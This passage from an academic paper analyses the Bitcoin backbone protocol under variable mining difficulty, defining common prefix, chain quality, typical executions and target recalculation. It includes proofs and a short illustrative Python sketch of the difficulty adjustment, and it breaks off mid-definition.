The procedure, given a chain $$\\mathcal {C}$$ and a value x to be inserted in the chain, hashes these values to obtain h and initializes a counter ctr. Subsequently, it increments ctr and checks to see whether $$H(ctr, h) < T$$; in case a suitable ctr is found then the algorithm succeeds in solving the POW and extends chain $$\\mathcal {C}$$ by one block.\n\nThe Bitcoin Backbone Protocol. The core of the backbone protocol with variable difficulty is similar to that in , with several important distinctions. First is the procedure to follow when the parties become active. Parties check the $$\\mathtt {ready}$$ flag they possess, which is false if and only if they have been inactive in the previous round. In case the $$\\mathtt {ready}$$ flag is false, they diffuse a special message ‘$$\\mathbf {Join}$$’ to request the most recent version of the blockchain(s). Similarly, parties that receive the special request message in their $$\\mathrm{R}\\textsc {eceive}()$$ tape broadcast their chains. As before parties, run “indefinitely” (our security analysis will apply when the total running time is polynomial in $$\\kappa$$). The input contribution function $$I(\\cdot )$$ and the chain reading function $$R(\\cdot )$$ are applied to the values stored in the chain. Parties check their communication tape $$\\mathrm{R}\\textsc {eceive}()$$ to see whether any necessary update of their local chain is due; then they attempt to extend it via the POW algorithm $$\\mathsf {pow}$$. The function $$I(\\cdot )$$ determines the input to be added in the chain given the party’s state st, the current chain $$\\mathcal {C}$$, the contents of the party’s input tape $$\\mathrm{I}\\textsc {nput}()$$ and communication tape Receive(). The input tape contains two types of symbols, $$\\mathrm{R}\\textsc {ead}$$ and $$(\\mathrm{I}\\textsc {nsert}, value)$$; other inputs are ignored. In case the local chain $$\\mathcal {C}$$ is extended the new chain is diffused to the other parties. Finally, in case a Read symbol is present in the communication tape, the protocol applies function $$R(\\cdot )$$ to its current chain and writes the result onto the output tape Output().\n\n### 4.2 Properties of the Backbone Protocol with Variable Difficulty\n\nNext, we define the two properties of the backbone protocol that the protocol will establish. They are close variants of the properties in , suitably modified for the dynamic q-bounded synchronous setting.\n\nThe common prefix property essentially remains the same. It is parameterized by a value $$k\\in \\mathbb {N}$$, considers an arbitrary environment and adversary, and it holds as long as any two parties’ chains are different only in their most recent k blocks. It is actually helpful to define the property between an honest party’s chain and another chain that may be adversarial. The definition is as follows.\n\n### Definition 3\n\n(Common-Prefix Property). 
The common-prefix property $$Q_\\mathsf {cp}$$ with parameter $$k\\in \\mathbb {N}$$ states that, at any round of the execution, if a chain $$\\mathcal {C}$$ belongs to an honest party, then for any valid chain $$\\mathcal {C}'$$ in the same round such that either $$\\mathrm {diff}(\\mathcal {C}')>\\mathrm {diff}(\\mathcal {C})$$, or $$\\mathrm {diff}(\\mathcal {C}')=\\mathrm {diff}(\\mathcal {C})$$ and $$\\mathrm {head}(\\mathcal {C}')$$ was computed no later than $$\\mathrm {head}(\\mathcal {C})$$, it holds that $$\\mathcal {C}^{\\lceil k}\\preceq \\mathcal {C}'\\hbox { and } \\mathcal {C}'^{\\lceil k}\\preceq \\mathcal {C}$$.\n\nThe second property, called chain quality, expresses the number of honest-party contributions that are contained in a sufficiently long and continuous part of a party’s chain. Because we consider chains of variable difficulty it is more convenient to think of parties’ contributions in terms of the total difficulty they add to the chain as opposed to the number of blocks they add (as done in ). The property states that adversarial parties are bounded in the amount of difficulty they can contribute to any sufficiently long segment of the chain.\n\n### Definition 4\n\n(Chain-Quality Property). The chain quality property $$Q_\\mathsf {cq}$$ with parameters $$\\mu \\in \\mathbb {R}$$ and $$\\ell \\in \\mathbb {N}$$ states that for any party P with chain $$\\mathcal {C}$$ in $$\\textsc {view} ^{\\mathbf {t},\\mathbf {n}}_{\\varPi , \\mathcal {A},\\mathcal {Z}}$$, and any segment of that chain of difficulty d such that the timestamp of the first block of the segment is at least $$\\ell$$ smaller than the timestamp of the last block, the blocks the adversary has contributed in the segment have a total difficulty that is at most $$\\mu \\cdot d$$.\n\n### 4.3 Application: Robust Transaction Ledger\n\nWe now come to the (main) application the Bitcoin backbone protocol was designed to solve. A robust transaction ledger is a protocol maintaining a ledger of transactions organized in the form of a chain $$\\mathcal {C}$$, satisfying the following two properties.\n\n• Persistence: Parameterized by $$k\\in \\mathbb {N}$$ (the “depth” parameter), if an honest party P, maintaining a chain $$\\mathcal {C}$$, reports that a transaction tx is in $$\\mathcal {C}^{\\lceil k}$$, then it holds for every other honest party $$P'$$ maintaining a chain $$\\mathcal {C}'$$ that if $$\\mathcal {C}'^{\\lceil k}$$ contains tx, then it is in exactly the same position.\n\n• Liveness: Parameterized by $$u,k\\in \\mathbb {N}$$ (the “wait time” and “depth” parameters, resp.), if a transaction tx is provided to all honest parties for u consecutive rounds, then it holds that for any player P, maintaining a chain $$\\mathcal {C}$$, tx will be in $$\\mathcal {C}^{\\lceil k}$$.\n\nWe note that, as in , Liveness is applicable to either “neutral” transactions (i.e., those that they are never in “conflict” with other transactions in the ledger), or transactions that are produced by an oracle $$\\mathsf {Txgen}$$ that produces honestly generated transactions.\n\n## 5 Overview of the Analysis\n\nOur main goal is to show that the backbone protocol satisfies the properties common prefix and chain quality (Sect. 4.2) in a $$(\\gamma ,s)$$-respecting environment as an intermediate step towards proving, eventually, that the protocol implements a robust transaction ledger. In this section we present a high-level overview of our approach; the full analysis is then presented in Sect. 6. 
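Before the analysis, the following minimal Python sketch may help fix ideas about the target (re)calculation function D of Definition 2, including the dampening filter parameterized by tau. It is not taken from the paper: the constants (KAPPA, Q, M, TAU, N0, F) are purely illustrative, real-valued targets are used, and the convention that the round preceding the first block is 0 is an assumption the excerpt does not pin down.

```python
# Illustrative sketch of Definition 2 (target recalculation with dampening).
KAPPA = 256                         # hash output length (illustrative)
Q     = 10**5                       # queries per party per round (illustrative)
M     = 2016                        # epoch length in blocks
TAU   = 4                           # dampening factor
N0    = 1000                        # initial estimate of the number of parties
F     = 0.03                        # desired block production rate per round
T0    = F * 2**KAPPA / (Q * N0)     # initial target, so that q*T0*n0 / 2^kappa = f

def D(timestamps):
    """Next target for a chain whose blocks carry timestamps r_1, ..., r_v."""
    v = len(timestamps)
    m_prime = M * (v // M)                     # index of the last epoch boundary
    if m_prime == 0:
        return T0                              # no completed epoch yet
    T = D(timestamps[:m_prime - 1])            # target used in the last completed epoch
    r_hi = timestamps[m_prime - 1]             # r_{m'} (1-indexed in the paper)
    r_lo = timestamps[m_prime - M - 1] if m_prime > M else 0   # assumed start = round 0
    delta = r_hi - r_lo                        # duration of the last completed epoch
    n_est = 2**KAPPA * M / (Q * T * delta)     # n(T, Delta): estimated number of parties
    candidate = (N0 / n_est) * T0
    # Dampening filter: the target may change by at most a factor of TAU per epoch.
    return max(T / TAU, min(TAU * T, candidate))

# An epoch that took twice the intended m/f rounds should roughly double the target.
timestamps = [round((i + 1) * 2 / F) for i in range(M)]
print(D(timestamps) / T0)   # ~2.0
```

The clamp in the last line of D is the dampening filter that, per Remark 2, is needed to rule out the known attack against the common-prefix property.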
To prove the aforementioned properties we first characterize the set of typical executions. Informally, an execution is typical if for any set S of consecutive rounds the successes of the adversary and the honest parties do not deviate too much from their expectations and no bad event occurs with respect to the hash function (which we model as a “random oracle”). Using the martingale bound of Theorem 6 we demonstrate that almost all polynomially bounded executions are typical. We then proceed to show that in a typical execution any chain that an honest party adopts (1) contains timestamps that are approximately accurate (i.e., no adversarial block has a timestamp that differs too much from its real creation time) and (2) has a target such that the probability of block production remains near a fixed constant f. Finally, these properties of a typical execution will bring us to our ultimate goal: to demonstrate that a typical execution enjoys the common prefix and the chain quality properties, and therefore one can build on the blockchain a robust transaction ledger (Sect. 4.3). Here we highlight the main steps and the novel concepts that we introduce.\n\n“Good” Executions. In order to be able to talk quantitatively about typical executions, we first introduce the notion of $$(\eta ,\theta )$$ -good executions, which expresses how well the parties approximate f. Suppose at round r exactly n parties query the oracle with target T. The probability at least one of them will succeed is\n\begin{aligned} f(T,n)=1-\Bigl (1-\frac{T}{2^\kappa }\Bigr )^{qn}. \end{aligned}\nFor the initial target $$T_0$$ and the initial estimate of the number of parties $$n_0$$, we denote $$f_0 = f(T_0, n_0)$$. Looking ahead, the objective of the target recalculation mechanism is to maintain a target T for each party such that $$f(T, n_r)\approx f_0$$ for all rounds r. (For succinctness, we will drop the subscript and simply refer to it as f.)\n\nNow, at a round r of an execution E the honest parties might be querying the random oracle for various targets. We denote by $$T_r^{\min }(E)$$ and $$T_r^{\max }(E)$$ the minimum and maximum over those targets. We say r is a target-recalculation point of a valid chain $$\mathcal {C}$$, if there is a block with timestamp r and m exactly divides the number of blocks up to (and including) this block. Consider constants $$\eta \in (0,1]$$ and $$\theta \in [1,\infty )$$ and an execution E:\n\nDefinition 5 (Abridged). A round r is $$(\eta ,\theta )$$ -good in E if $$\eta f \le f(T_r^{\min }(E),n_r)$$ and $$f(T_r^{\max }(E),n_r) \le \theta f$$. An execution E is $$(\eta ,\theta )$$ -good if every round of E was $$(\eta ,\theta )$$-good.\n\nWe are going to study the progress of the honest parties only when their targets lie in a reasonable range. It will turn out that, with high probability, the honest parties always work with reasonable targets. The following bound will be useful because it gives an estimate of the progress the honest parties have made in an $$(\eta ,\theta )$$-good execution. We will be interested in the progress coming from uniquely successful rounds, where exactly one honest party computed a POW. Let $$Q_r$$ be the random variable equal to the (maximum) difficulty of such rounds (recall a block with target T has difficulty 1 / T); 0 otherwise. We refer to $$Q_r$$ also as “unique” difficulty. We are able to show the following.\n\nProposition 2 (Informal). 
If r is an $$(\\eta ,\\theta )$$-good round in an execution E, then $$\\mathbf {E}[Q_r(E_{r-1})]\\ge (1-\\theta f){pn_r}$$, where $$Q_r(E_{r-1})$$ is the unique difficulty conditioned on the execution so far, and $$p =\\frac{q}{2^\\kappa }$$.\n\n“Per round” arguments regarding relevant random variables are not sufficient, as we need executions with “good” behavior over a sequence of rounds—i.e., variables should be concentrated around their means. It turns out that this is not easy to get, as the probabilities of the experiments performed per round depend on the history (due to target recalculation). To deal with this lack of concentration/variance problem, we introduce the following measure.\n\nTypical Executions. Intuitively, the idea that this notion captures is as follows. Note that at each round of a given execution E the parties perform Bernoulli trials with success probabilities possibly affected by the adversary. Given the execution, these trials are determined and we may calculate the expected progress the parties make given the corresponding probabilities. We then compare this value to the actual progress and if the difference is “reasonable” we declare E typical. Note, however, that considering this difference by itself will not always suffice, because the variance of the process might be too high. Our definition, in view of Theorem 6 (Appendix A), says that either the variance is high with respect to the set of rounds we are considering, or the parties have made progress during these rounds as expected. A bit more formally, for a given random oracle query in an execution E, the history of the execution just before the query takes place, determines the parameters of the distribution that the outcome of this query follows as a POW (a Bernoulli trial). For the queries performed in a set of rounds S, let V(S) denote the sum of the variances of these trials.\n\nDefinition 8 (Abridged). An execution E is $$(\\epsilon ,\\eta ,\\theta )$$-typical if, for any given set S of consecutive rounds such that V(S) is appropriately bounded from above:\n• The average unique difficulty is lower-bounded by $$\\frac{1}{|S|}(\\sum _{r\\in S}\\mathbf {E}[Q_r(E_{r-1})] -\\epsilon (1-\\theta f)p\\sum _{r\\in S}n_r)$$;\n\n• the average maximum difficulty is upper-bounded by $$\\frac{1}{|S|} (1+\\epsilon )p\\sum _{r\\in S}n_r$$;\n\n• the adversary’s average difficulty of blocks with “easy” targets is upper-bounded by $$\\frac{1}{|S|} (1+\\epsilon )p\\sum _{r\\in S}t_r$$, while the number of blocks with “hard” targets is bounded below m by a suitable constant; and\n\n• no “bad events” with respect to the hash function occur (e.g., collisions).\n\nThe following is one of the main steps in our analysis.\n\nProposition 4 (Informal). Almost all polynomially bounded executions (in $$\\kappa$$) are typical. The probability of an execution not being typical is bounded by $$\\exp (-\\varOmega ( \\min \\{ m, \\kappa \\}) + \\ln L)$$ where L is the total run-time.\n\nRecall (Remark 2) that the dynamic setting (specifically, the use of target recalculation functions) offers more opportunities for adversarial attacks . The following important intermediate lemma shows that if a typical execution is good up to a certain point, chains that are privately mined for long periods of time by the adversary will not be adopted by honest parties.\n\nLemma 2 (Informal). Let E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. 
If $$E_{r}$$ is $$(\\eta ,\\theta )$$-good, then, no honest party adopts at round $$r+1$$ a chain that has not been extended by an honest party for at least $$O(\\frac{m}{\\tau f})$$ consecutive rounds.\n\nAn easy corollary of the above is that in typical executions, the honest parties’ chains cannot contain blocks with timestamps that differ too much from the blocks’ actual creation times.\n\nCorollary 1 (Informal). Let E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. If $$E_{r-1}$$ is $$(\\eta ,\\theta )$$-good, then the timestamp of any block in $$E_{r}$$ is at most $$O(\\frac{m}{\\tau f})$$ away from its actual creation time (cf. the notion of accuracy in Definition 6).\n\nAdditional important results we obtain regarding $$(\\eta ,\\theta )$$-good executions are that their epochs last about as much as they should (Lemma 3), as well as a “self-correcting” property, which essentially says that if every chain adopted by an honest party is $$(\\eta \\gamma ,\\smash {\\frac{\\theta }{\\gamma }})$$-good in $$E_{r-1}$$ (cf. the notion of a good chain in Definition 5), then $$E_r$$ is $$(\\eta ,\\theta )$$-good (Corollary 2). The above (together with several smaller intermediate steps that we omit from this high-level overview) allow us to conclude:\n\nTheorem 1 (Informal). A typical execution in a $$(\\gamma ,s)$$-respecting environment is $$O(\\frac{m}{\\tau f})$$-accurate and $$(\\eta ,\\theta )$$-good.\n\nCommon Prefix and Chain Quality. Typical executions give us the two desired low-level properties of the blockchain:\n\nTheorems 2 and 3 (Informal). Let E be a typical execution in a $$(\\gamma ,s)$$-respecting environment. Under the requirements of Table 1 (Sect. 6.1), common prefix holds for any $$k\\ge \\theta \\gamma m/ 8 \\tau$$ and chain quality holds for $$\\ell = m/16\\tau f$$ and $$\\mu \\le 1-\\delta /2$$, where for all r, $$t_r < n_r( 1-\\delta )$$.\n\nRobust Transaction Ledger. Given the above we then prove the properties of the robust transaction ledger:\n\nTheorems 4 and 5 (Informal). Under the requirements of Table 1, the backbone protocol satisfies persistence with parameter $$k=\\varTheta (m)$$ and liveness with wait time $$u=\\varOmega (m+k)$$ for depth k.\n\nWe refer to Sect. 6 for the full analysis of the protocol.\n\n## 6 Full Analysis\n\nIn this section we present the full analysis and proofs of the backbone protocol and robust transaction ledger application with chains of variable difficulty. The analysis follows at a high level the roadmap presented in Sect. 5.\n\n### 6.1 Additional Notation, Definitions, and Preliminary Propositions\n\nOur probability space is over all executions of length at most some polynomial in $$\\kappa$$. Formally, the set of elementary outcomes can be defined as a set of strings that encode every variable of every party during each round of a polynomially bounded execution. We won’t delve into such formalism and leave the details unspecified. We will denote by $$\\mathrm{Pr}$$ the probability measure of this space. Define also the random variable $$\\mathcal {E}$$ taking values on this space and with distribution induced by the random coins of all entities (adversary, environment, parties) and the random oracle.\n\nSuppose at round r exactly n parties query the oracle with target T. The probability at least one of them will succeed is\n\\begin{aligned} f(T,n)=1-\\Bigl (1-\\frac{T}{2^\\kappa }\\Bigr )^{qn}. 
\\end{aligned}\nFor the initial target $$T_0$$ and the initial estimate of the number of parties $$n_0$$, we denote $$f_0 = f(T_0, n_0)$$. Looking ahead, the objective of the target recalculation mechanism would be to maintain a target T for each party such that $$f(T, n_r)\\approx f_0$$ for all rounds r. For this reason, we will drop the subscript from $$f_0$$ and simply refer to it as f; to avoid confusion, whenever we refer to the function $$f(\\cdot ,\\cdot )$$, we will specify its two operands.\n\nNote that f(Tn) is concave and increasing in n and T. In particular, Fact 2 applies. The following proposition provides useful bounds on f(Tn). For convenience, define $$p=q/2^{\\kappa }$$.\n\n### Proposition 1\n\nFor positive integers $$\\kappa ,q,T,n$$ and f(Tn) defined as above,\n$$\\frac{pTn}{1+pTn}\\le f(T,n)\\le {pTn}\\le \\frac{f(T,n)}{1-f(T,n)},\\ \\, \\hbox {where}\\ \\,p=\\frac{q}{2^\\kappa }.$$\n\n### Proof\n\nThe bounds can be obtained using the inequalities $$(1-x)^\\alpha \\ge 1-x\\alpha$$, valid for $$x\\le 1$$ and $$\\alpha \\ge 1$$, and $$e^{-x}\\le \\frac{1}{1+x}$$, valid for $$x\\ge 0$$.    $$\\square$$\n\nAt a round r of an execution E the honest parties might be querying the random oracle for various targets. We denote by $$T_r^{\\min }(E)$$ and $$T_r^{\\max }(E)$$ the minimum and maximum over those targets. We say r is a target-recalculation point of a valid chain $$\\mathcal {C}$$, if there is a block with timestamp r and m exactly divides the number of blocks up to (and including) this block.\n\nWe now define two desirable properties of executions which will be crucial in the analysis. We will show later that most executions have these properties.\n\n### Definition 5\n\nConsider an execution E and constants $$\\eta \\in (0,1]$$ and $$\\theta \\in [1,\\infty )$$. A target-recalculation point r in a chain $$\\mathcal {C}$$ in E is $$(\\eta ,\\theta )$$ -good if the new target T satisfies $$\\eta f\\le f(T,n_r)\\le \\theta f$$. A chain $$\\mathcal {C}$$ in E is $$(\\eta ,\\theta )$$ -good if all its target-recalculation points are $$(\\eta ,\\theta )$$ -good. A round r is $$(\\eta ,\\theta )$$ -good in E if $$\\eta f\\le f(T_r^{\\min }(E),n_r)$$ and $$f(T_r^{\\max }(E),n_r)\\le \\theta f$$. We say that E is $$(\\eta ,\\theta )$$ -good if every round of E was $$(\\eta ,\\theta )$$-good.\n\nFor a round r, the following set of chains is of interest. It contains, besides the chains that the honest parties have, those chains that could potentially belong to an honest party.\nwhere $$\\mathcal {C}\\in E_r$$ means that $$\\mathcal {C}$$ exists and is valid at round r.\n\n### Definition 6\n\nConsider an execution E. For $$\\epsilon \\in [0,\\infty )$$, a block created at round r is $$\\epsilon$$ -accurate if it has a timestamp $$r'$$ such that $$|r'-r|\\le \\epsilon \\frac{ m}{f}$$. We say that $$E_r$$ is $$\\epsilon$$ -accurate if no chain in $$\\mathcal {S}_r$$ contains a block that is not $$\\epsilon$$-accurate. We say that E is $$\\epsilon$$ -accurate if for every round r in the execution, $$E_r$$ is $$\\epsilon$$-accurate.\n\nOur next step is to define the typical set of executions. To this end we define a few more quantities and random variables.\n\nIn an actual execution E the honest parties may be split across different chains with possibly different targets. We are going to study the progress of the honest parties only when their targets lie in a reasonable range. It will turn out that, with high probability, the honest parties always work with reasonable targets. 
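As a quick numerical sanity check of the bounds in Proposition 1, the following short Python sketch (illustrative parameters only; the values of kappa, q and the choice of T below are not taken from the paper) verifies that f(T,n) lies between pTn/(1+pTn) and pTn for a few party counts.

```python
# Check  pTn/(1+pTn) <= f(T,n) <= pTn,  where p = q/2^kappa and
# f(T,n) = 1 - (1 - T/2^kappa)^{qn}. All parameter values are illustrative.
KAPPA = 256
q = 10**5
p = q / 2**KAPPA

def f(T, n):
    return 1 - (1 - T / 2**KAPPA) ** (q * n)

for n in (10, 1000, 100000):
    T = 0.03 * 2**KAPPA / (q * n)   # keep pTn = 0.03, as target recalculation aims to do
    lower, upper = p * T * n / (1 + p * T * n), p * T * n
    print(n, lower <= f(T, n) <= upper)   # prints True for each n
```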
For a round r, a set of consecutive rounds S, and constant $$\\eta \\in (0,1)$$, let\n\\begin{aligned} T^{(r,\\eta )}=\\frac{\\eta f}{pn_r}\\quad \\hbox {and}\\quad T^{(S,\\eta )}=\\min _{r\\in S}T^{(r,\\eta )}. \\end{aligned}\nTo expunge the mystery from the definition of $$T^{(r,\\eta )}$$, note that in an $$(\\eta ,\\theta )$$-good round all honest parties query for target at least $$T^{(r,\\eta )}$$. We now define for each round r a real random variable $$D_r$$ equal to the maximum difficulty among all blocks with targets at least $$T^{(r,\\eta )}$$ computed by honest parties at round r. Define also $$Q_r$$ to equal $$D_r$$ when exactly one block was computed by an honest party and 0 otherwise.\n\nRegarding the adversary, we are going to be interested in periods of time during which he has gathered a number of blocks in the order of m. Given that the targets of blocks are variable themselves, it is appropriate to consider the difficulty acquired by the adversary not in a set of consecutive rounds but rather in a set of consecutive adversarial queries that may span a number of rounds but do are not necessarily a multiple of q.\n\nFor a set of consecutive queries indexed by a set J, we define the following value that will act as a threshold for targets of blocks that are attempted adversary.\n\\begin{aligned} T^{(J)}=\\frac{\\eta (1-\\delta )(1-2\\epsilon )(1-\\theta f)}{32\\tau ^3\\gamma } \\cdot \\frac{m}{|J|}\\cdot 2^\\kappa . \\end{aligned}\nGiven the above threshold, for $$j\\in J$$, if the adversary computed at his j-th query a block of difficulty at most $$1/T^{\\smash {(J)}}$$, then let the random variable $$A^{\\smash {(J)}}_j$$ be equal to the difficulty of this block; otherwise, let $$A^{\\smash {(J)}}_j=0$$. The above definition suggests that we collect in $$A^{\\smash {(J)}}_j$$ the difficulty acquired by the adversary as long as it corresponds to blocks that are not too difficult (i.e., those with targets less than $$T^{(J)}$$). With foresight we note that this will enable a concentration argument for random variable $$A^{\\smash {(J)}}_j$$. We will usually drop the superscript (J) from A.\n\nLet $$\\mathcal {E}_{r-1}$$ contain the information of the execution just before round r. In particular, a value $$E_{r-1}$$ of $$\\mathcal {E}_{r-1}$$ determines the targets against which every party will query the oracle at round r, but it does not determine $$D_r$$ or $$Q_r$$. If E is a fixed execution (i.e., $$\\mathcal {E}=E$$), denote by $$D_r(E)$$ and $$Q_r(E)$$ the value of $$D_r$$ and $$Q_r$$ in E. If a set of consecutive queries J is considered, then, for $$j\\in J$$, $$A^{\\smash {(J)}}_j(E)$$ is defined analogously. In this case we will also write $$\\mathcal {E}^{\\smash {(J)}}_j$$ for the execution just before the j-th query of the adversary.\n\nWith respect to the random variables defined above, the following bound will be useful because it gives an estimate of the progress the honest parties have made in an $$(\\eta ,\\theta )$$-good execution. Note that we are interested in the progress coming from uniquely successful rounds, where exactly one honest party computed a POW. The expected difficulty that will be computed by the $$n_r$$ honest parties at round r is $$pn_r$$. However, the easier the POW computation is, the smaller $$\\mathbf {E}[Q_r|\\mathcal {E}_{r-1}=E_{r-1}]$$ will be with respect to this value. Since the execution is $$(\\eta ,\\theta )$$-good, a POW is computed by the honest parties with probability at most $$\\theta f$$. 
This justifies the appearance of $$(1-\\theta f)$$ in the bound.\n\n### Proposition 2\n\nIf round r is $$(\\eta ,\\theta )$$-good in E, then  $$\\mathbf {E}[Q_r|\\mathcal {E}_{r-1}=E_{r-1}]\\ge (1-\\theta f){pn_r}$$.\n\n### Proof\n\nLet us drop the subscript r for convenience. Suppose that the honest parties were split into k chains with corresponding targets $$T_1\\le T_2\\le \\cdots \\le T_k=T^{\\max }$$. Let also $$n_1,n_2,\\dots ,n_k$$, with $$n_1+\\cdots +n_k=n$$, be the corresponding number of parties with each chain. First note that\n$$\\prod _{j\\in [k]}\\bigl [1-f(T_j,n_j)\\bigr ] \\ge \\prod _{j\\in [k]}\\bigl [1-f(T^{\\max },n_j)\\bigr ] =1-f(T^{\\max },n)\\ge 1-\\theta f,$$\nwhere the first inequality holds because f(Tn) is increasing in T. Proposition 1 now gives\n$$\\mathbf {E}[Q_r|\\mathcal {E}_{r-1}=E_{r-1}] =\\sum _{i\\in [k]}\\frac{f(T_i,n_i)/T_i}{1-f(T_i,n_i)}\\cdot \\prod _{j\\in [k]}\\bigl [1-f(T_j,n_j)\\bigr ] \\ge (1-\\theta f)\\sum _{i\\in [k]}pn_i.$$\n$$\\square$$\n\nThe properties we have defined will be shown to hold in a $$(\\gamma ,s)$$-respecting environment, for suitable $$\\gamma$$ and s. The following simple fact is a consequence of the definition.\n\n### Fact 1\n\nIn a $$(\\gamma ,s)$$-respecting environment, for any set S of consecutive rounds with $$|S|\\le s$$, any $$S'\\subseteq S$$, and any $$n\\in \\{n_r:r\\in S\\}$$,\n\\begin{aligned} \\frac{1}{\\gamma }\\cdot n\\le \\frac{1}{|S'|}\\cdot \\sum _{r\\in S'}n_r\\le \\gamma \\cdot n. \\end{aligned}\n\n### Proof\n\nThe average of several numbers is bounded by their $$\\min$$ and $$\\max$$. Furthermore, the definition of $$(\\gamma ,s)$$-respecting implies $$\\min _{r\\in S}n_r\\ge \\frac{1}{\\gamma }\\max _{r\\in S}n_r\\ge \\frac{1}{\\gamma }n$$ and $$\\max _{r\\in S}n_r\\le \\gamma \\min _{r\\in S}\\le \\gamma n$$. Thus,\n$$\\frac{1}{\\gamma }\\cdot n\\le \\min _{r\\in S}n_r\\le \\min _{r\\in S'}n_r\\le \\frac{1}{|S'|}\\cdot \\sum _{r\\in S'}n_r \\le \\max _{r\\in S'}n_r\\le \\max _{r\\in S}n_r\\le \\gamma \\cdot n.$$\n$$\\square$$\n\nOur analysis involves a number of parameters that are suitably related. Table 1 summarizes them, recalls their definitions and lists all the constraints that they should satisfy.\n\n### Remark 3\n\nWe remark that for the actual parameterization of the parameters $$\\tau ,m,f$$ of Bitcoin5, i.e., $$\\tau =4,m=2016,f=0.03$$, vis-à-vis the constraints of Table 1, they can be satisfied for $$\\delta = 0.99, \\eta =0.268, \\theta =1.995,\\epsilon = 2.93\\cdot 10^{-8}$$, for $$\\gamma =1.281$$ and $$s = 2.71\\cdot 10^{5}$$. Given that s measures the number of rounds within which a fluctuation of $$\\gamma$$ may take place, we have that the constraints are satisfiable for a fluctuation of up to $$28\\%$$ every approximately 2 months (considering a round to last 18 s).\n\nTable 1.\n\nSystem parameters and requirements on them. The parameters are as follows: positive integers smL; positive reals $$f,\\gamma ,\\delta ,\\epsilon ,\\tau ,\\eta ,\\theta$$, where $$f,\\epsilon ,\\delta \\in (0,1),$$ and $$0<\\eta \\le 1\\le \\theta$$.\n\n $$n_r$$: number of honest parties mining in round r $$t_r$$: number of activated parties that are corrupted $$\\delta$$: advantage of honest parties, $$\\forall r (t_r/n_r<1-\\delta )$$ $$(\\gamma , s)$$: determines how the number of parties fluctuates across rounds, cf. 
Definition 1 f: probability at least one honest party succeeds in a round assuming $$n_0$$ parties and target $$T_0$$ (the protocol’s initialization parameters) $$\\tau$$: the dampening filter, see Definition 2 $$(\\eta ,\\theta )$$: lower and upper bound determining the goodness of an execution, cf. Definition 5 $$\\epsilon$$: quality of concentration of random variables in typical executions, cf. Definition 8 m: the length of an epoch in number of blocks L: the total run-time of the system [(R0)] $$\\forall r : t_r < (1-\\delta ) n_r$$ [(R1)] $$s\\ge \\frac{\\tau m}{f}+\\frac{m}{8\\tau f}$$ [(R2)] $$\\frac{\\delta }{2}\\ge 2\\epsilon +\\theta f$$ [(R4)] $$17(1+\\epsilon )\\theta \\le 8\\tau (\\gamma -{\\theta f})$$ [(R5)] $$9(1+\\epsilon )\\eta \\gamma ^2\\le 4(1-\\eta \\gamma f)$$ [(R6)] $$7\\theta (1-\\epsilon )(1-\\theta f)\\ge 8\\gamma ^2$$\n\n### 6.2 Chain-Growth Lemma\n\nWe now prove the Chain-growth lemma. This lemma appears already in , but it refers to number of blocks instead of difficulty. In the name “chain growth” appears for the first time and the authors explicitly state a chain-growth property.\n\nInformally, this lemma says that honest parties will make as much progress as how many POWs they obtain. Although simple to prove, the chain-growth lemma is very important, because it shows that no matter what the adversary does the honest parties will advance (in terms of accumulated difficulty) by at least the difficulty of the POWs they have acquired.\n\n### Lemma 1\n\nLet E be any execution. Suppose that at round u an honest party has a chain of difficulty d. Then, by round $$v+1\\ge u$$, every honest party will have received a chain of difficulty at least $$\\,d+\\sum _{r=u}^vD_r(E)$$.\n\n### Proof\n\nBy induction on $$v-u$$. For the basis, $$v+1=u$$ and $$\\,d+\\sum _{r=u}^vD_r(E)=d$$. Observe that if at round u an honest party has a chain $$\\mathcal {C}$$ of difficulty d, then that party broadcast $$\\mathcal {C}$$ at a round earlier than u. It follows that every honest party will receive $$\\mathcal {C}$$ by round u.\n\nFor the inductive step, note that by the inductive hypothesis every honest party has received a chain of difficulty at least $$d'=d+\\sum _{r=u}^{v-1}D_r$$ by round v. When $$D_v=0$$ the statement follows directly, so assume $$D_v>0$$. Since every honest party queried the oracle with a chain of difficulty at least $$d'$$ at round v, if follows that an honest party successful at round v broadcast a chain of difficulty at least $$d'+D_v=d+\\sum _{r=u}^vD_r$$.    $$\\square$$\n\n### 6.3 Typical Executions: Definition and Related Proofs\n\nWe can now define formally our notion of typical executions. Intuitively, the idea that this definition captures is as follows. Suppose that we examine a certain execution E. Note that at each round of E the parties perform Bernoulli trials with success probabilities possibly affected by the adversary. Given the execution, these trials are determined and we may calculate the expected progress the parties make given the corresponding probabilities. We then compare this value to the actual progress and if the difference is reasonable we declare E typical. Note, however, that considering this difference by itself will not always suffice, because the variance of the process might be too high. 
Our definition, in view of Theorem 6, says that either the variance is high with respect to the set of rounds we are considering, or the parties have made progress during these rounds as expected.\n\nBeyond the behavior of random variables described above, a typical execution will also be characterized by the absence of a number of bad events about the underlying hash function $$H(\\cdot )$$ which is used in proofs of work and is modeled as a random oracle. The bad events that are of concern to us are defined as follows; (recall that a block’s creation time is the round that it has been successfully produced by a query to the random oracle either by the adversary or an honest party).\n\n### Definition 7\n\nAn insertion occurs when, given a chain $$\\mathcal {C}$$ with two consecutive blocks B and $$B'$$, a block $$B^*$$ created after $$B'$$ is such that $$B,B^*,B'$$ form three consecutive blocks of a valid chain. A copy occurs if the same block exists in two different positions. A prediction occurs when a block extends one with later creation time.\n\nGiven the above we are now ready to specify what is a typical execution.\n\n### Definition 8\n\n(Typical execution). An execution E is $$(\\epsilon ,\\eta ,\\theta )$$-typical if the following hold:\n1. (a)\nIf, for any set S of consecutive rounds, $$pT^{(S,\\eta )}\\sum _{r\\in S}n_r\\ge \\frac{\\eta m}{16\\tau \\gamma }$$, then\n\\begin{aligned}\\begin{gathered} \\sum _{r\\in S}Q_r(E)\\ge \\sum _{r\\in S}\\mathbf {E}[Q_r|\\mathcal {E}_{r-1}=E_{r-1}] -\\epsilon (1-\\theta f)p\\sum _{r\\in S}n_r \\\\ \\text { and } \\sum _{r\\in S}D_r(E)\\le (1+\\epsilon )p\\sum _{r\\in S}n_r. \\end{gathered}\\end{aligned}\n\n2. (b)\nFor any set J indexing a set of consecutive queries of the adversary we have\n\\begin{aligned} \\sum _{j\\in J}A_j(E)\\le (1+\\epsilon )2^{-\\kappa }|J| \\end{aligned}\nand during these queries the blocks with targets (strictly) less than $$\\tau T^{\\smash {(J)}}$$ that the adversary has acquired are (strictly) less than $$\\frac{\\eta (1-\\epsilon )(1-\\theta f)}{32\\tau ^2\\gamma }\\cdot m$$.\n\n3. 